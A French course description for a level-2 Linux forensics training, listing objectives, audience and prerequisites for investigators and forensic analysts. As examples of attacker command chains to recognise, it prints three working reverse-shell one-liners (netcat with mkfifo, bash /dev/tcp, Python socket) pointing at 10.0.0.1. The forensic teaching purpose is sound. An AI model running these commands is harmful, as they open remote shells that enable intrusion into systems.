Objectifs

A l’issue de la formation, les stagiaires doivent être en mesure :

• De maîtriser le système d’exploitation GNU/Linux (connaissance approfondie du fonctionnement de GNU/Linux de l’arborescence, des services, des applications présentes par défaut) ;
• De savoir faire une analyse forensique d’un système GNU/Linux cible de type ordinateur de particuliers ;
• De connaître différentes techniques d’analyse permettant de traiter un serveur compromis (analyse de logs, analyse d’artefacts, etc.)
• D’être en mesure de comprendre des enchaînements de commandes utilisés par les attaquants ; par exemple :
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
  • bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
  • python -c ‘import socket, subprocess, os;                                                        \

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);              \

s.connect((« 10.0.0.1 »,1234));                                                                \

os.dup2(s.fileno(),0);                                                                               \

os.dup2(s.fileno(),1);                                                                               \

os.dup2(s.fileno(),2);                                                                               \

p=subprocess.call([« /bin/sh », »-i »]);’

Prérequis & Public Visé

Ce cours est dédié aux personnes souhaitant disposer de bases solides dans l’utilisation du système d’exploitation GNU/Linux. La dimension investigation numérique donnée à ce cours destine la formation aux enquêteurs et aux analystes forensiques, cependant toute personne désireuse d’en connaître plus sur ce système peut prétendre participer au cours.

Une connaissance basique du système GNU/Linux est nécessaire. Une connaissance du terminal et des utilitaires courants est indispensable.

La formation TLF01 – Linux Forensics LVL 1 couvre l’essentiel des connaissances nécessaires à cette formation.